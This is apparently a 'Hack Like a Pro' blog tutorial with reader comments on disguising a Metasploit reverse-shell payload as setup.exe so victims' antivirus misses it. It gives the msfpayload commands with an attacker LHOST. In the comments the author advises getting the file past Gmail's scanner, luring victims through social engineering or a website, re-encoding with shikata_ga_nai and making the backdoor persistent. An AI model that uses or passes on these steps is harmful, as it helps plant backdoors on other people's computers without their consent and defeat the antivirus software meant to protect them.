Hack Like a Pro: How to Bypass Antivirus Software by Disguising an Exploit's Signature

How to Bypass Antivirus Software by Disguising an Exploit's Signature

Welcome back my fellow hackers!

In my last few articles, I've concentrated on what is called a listener, which is basically the same thing as backdoor and rootkit, only "listener" sounds much less malevolent than the other two terms.

First, I covered embedding a listener in a Microsoft Office document (Excel, PowerPoint, Word, etc.), then in an Adobe Reader PDF file. In both cases, when the victim opens the file, a small program runs in the background that allows us to connect to their system and control it.

The Problem

The only possible hitch in this scenario is that the victim's antivirus program is activated, is up to date, and detects our little program. In that case, the victim is unlikely to open the file and we don't get to play. But, in this lesson, I'll show you how to morph the listener so that the victim's antivirus software is unlikely to detect it.

All antivirus software is based upon the very simple idea of malware signatures. What this means is that the antivirus software publishers simply keep track of what the malicious software looks like—when your AV software updates each day, it picks all new signatures. When it detects something that looks like one of these signatures, they alert the user and quarantine the malicious software.

The Exploit

Fortunately for us, we can essentially change the signature of our malicious software without changing what it does. We simply re-code in a way that the AV software doesn't have a signature of. Pretty simple, wouldn't you say?

Okay. Once again, fire up your BackTrack and Metasploit and let's get working on some metamorphosis.

Step 1: Explore Msfpayload

Let's start by exploring msfpayload as part of the Metasploit suite. By typing msfpayload with the –h switch, we can get the help screen on this module.

msfpayload -h

Notice in the screenshot above that the syntax for this module includes options, the payload, and then several values that enable us to encode the payload using various programming languages including C, Perl, Ruby, Raw, VBA and others.

Msfpayload enables us to convert the code of the payload into any of these choices and thereby better evade the victim's AV software.

Step 2: Generate a Custom Payload

Let's proceed to generate a customized payload in C.

msfpayload windows/shell/reverse_tcp -o

Notice that we used the –o option and Metasploit displays our various options. To generate the the customized payload we need to pass the options to Metasploit, in this case the LHOST and the LPORT. Let's set those to our machine 192.168.100.1 and the LPORT to 4441.

We need to now generate a custom payload in C by typing:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C

Notice that we appended the command with a capital C to indicate that we wanted the payload to be generated in C. As you can see from screenshot above, Metasploit generated the payload in C and displayed it to us.

Step 3: Generate the Binary Code

Finally, we need to generate a binary executable for the shellcode which can use in our client side attack.

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe

We have now created an executable file by using the X option and then sent this file to the current folder and named the file setup.exe. We can now use this new payload in a client-side attack and the victim's AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.

And that's it! Stay tuned for my next lesson, where we'll explore ways to disable the client AV software altogether.

Cover photo by Technicalinfo

51 Comments

i'll get like 27/46 with my custom exe template.

So this process create an undectable ".exe" backdoor ? How hackers hide trojan wich is normaly detectable ? Is it the same process ?

Danny:

Not exactly the same, but very similar.

OTW

I am having trouble, when I send the .exe file after creating it in C, the antivirus picks it up. If I do it in any other language, the antivirus on the email itself picks it up, and doesn't allow me to send it. What I do know though, is the program in C is bypassing the email antivirus, but getting caught by the antivirus on the system I am sending it to. The antivirus is Avast.

Jake:

As a hacker, we often need to de-activate our antivirus software. If we don't, it is constantly detecting our tools as malware. I would suggest you de-activate your AV software.

OTW

Do you know how to get round the Google Mail virus detector?
Or, perhaps, which carrier do you use for sending viruses (on your private network or otherwise).

Thank you,

Nemesis1512.

Nemesis:

You will need to change the file's signature.

OTW

Of course!
Thank you very much, I feel silly for not thinking of that.

Nemesis1512.

to do the re-encoding we open a terminal windows right? how i put my root@bt like yours("root@bt:~/.msf4/local")?

Luis:

This is really a Linux issue. Take a look at my tutorials on Linux for hackers. There are 11 units to teach you the basics of Linux.

OTW

i already saw some of them i will look to them again and try this tut again

OTW:
I already did the setup.exe but I still can't send the file any advice...

What do you mean by "can't send it"?

through mail, sorry i didn't specified.

Still, what happens when you try to email it?

already found my error, didn't changed to right cd... sorry by the bothering

I didn't understand this. You didn't change to the right cd?

Now the cd was right, and I can't send the file by mail it happens when I attach the file and click send it appears "One of your attachments contained a virus. Your messagewas not send"...

Luis:

The key to getting past AV software is to change the signature of the file. Have you tried re-encoding it to C, or Ruby, Python or PERL?

Also, with some exploits, you have to be creative in the delivery. If you can't send it via email, try another route. You might try social engineering or getting someone to download it from your website, etc.

OTW

to re-encode for example to Ruby in this step(msfpayload windows/shell/reversetcp LHOST=192.168.100.1 LPORT=4441 C) i need to trade the C for Ruby right?

how can I apply this to the listener I made from your previous tutorial?

how can I apply this to the listener I made from your previous tutorial?

Greenlemon:

I'm not sure I understand your question. Can you be more specific?

OTW

You taught us on how to embed a listener to a microsoft file(.rtf). Here, you used a different file to disguise a signature. Now, what step in this tutorial should I modify so that I can apply this to the embedded listener from your previous tutorial. I want that listener to disguise the exploit. signature.

Greenlemon:

Simply replace any payload in the line that starts "msfpayload".

OTW

Hi,
I was wondering how to apply this to the listener made from your last tutorial? (.rtf/.pdf)
I am not sure how to disguise it? :)

Igrac:

Can you be more specific. What don't you understand?

OTW

Well, in the tutorial about embedding a listener (.rtf/.pdf) I've learnt how to make one. And now, how can I implement this in that listener I have made? How to use this to disguise a listener, so that the listener itself doesn't get detected by the antivirus?

Igrac;

Simply use the payload created here with another exploit.

OTW

Okay, but when I try to use this setup.exe as the payload for an adobepdfembeddedexe payload, it won't accept it. Can you please explain to me why an "embedded exe" exploit will not accept an embedded exe?

Igrac:

Here is another way, that almost always works.

OTW

Hi,

I was wondering how to create the file in a different format. Like in this tutorial you created an exe but I was wondering how to create a different file format like jar, rtf, etc.

Thank you!

Jemynted:

Welcome to Null Byte!

You can create the create using many different formats but keep in mind that the payload must be able to work on the target system. This tutorial is not on creating a payload but rather re-encoding it to avoid AV. You probably wouldn't want to use a .jar file as the system would place the file in the Java virtual machine and that would not give us system access that we want. There are different exploits that use.doc , pdf , rtf , etc type exploits in Metasploit. Check those out.

OTW

u said Simply replace any payload in the line that starts "msfpayload". I don't really understand. Can I add u on skype, I really want to ask u more, it just take few seconds.

Nguyn:

Welcome to Null Byte!

Plesae feel free to ask me any questions here. I do not answer questions on skype or other mediums as I must maintain my anonymity.

OTW

I created a setup.exe file, i also created a listener that embed in a word document, what can i do now to make my listener bypass AV software. U said replace msfpayload line, i dont really understand how.

Linh:

Now, you only need to send the listener embedded in a word doc to the victim. When they open it, you will have a listener on their system.

OTW

my gmail still dectected my listener as virus, did i failed something or I have to find other way to send it?

You may have to use a different encoding system. The whole process is meant to change its signature so that the AV doesn't detect it. If it still detects after this change, take a look at another of the many encoding schemes Metasploit. For instance, check out shikat_ga_nai, that XOR's the payload.

Can the antivirus on my host computer interfere with kali linux (running as a Virtual guest machine).

gotcha one question when i run exploit at my target PC does exploit stay active when i turn off my kali linux or his win XP? or i must send him again ? thx for reply :)

It is active until the target machine is rebooted.

If you make the payload persistent, it will restart after the system is rebooted.

Hello OTW, How to make my payload persistent?

not yet . i'll read now.

great tutorial

I did everything right I opened the setup.exe in my target host ...but in my machine always stuck at starting payload handler..and it doesn't create a session ...help:(

my target is windows xp
and I'm using kali linux.

hi great tut

i have done everything u said and now it is undetectable but my problem is i use it as template for Java-sigend-applet but my AV always detects siteloader.jar |xxxx|payload.css :(( is there anyway i can encode or encrypt this siteloader.jar or payload.css i have been looking for the answer for a few weeks and i haven't find any answer plz i need help :((

I opened the pdf file on win7. THe file opened a cmd on pc yet nothing happened on the terminal and there are no active sessions.

HELP PLEASE

Share Your Thoughts

  • Hot
  • Latest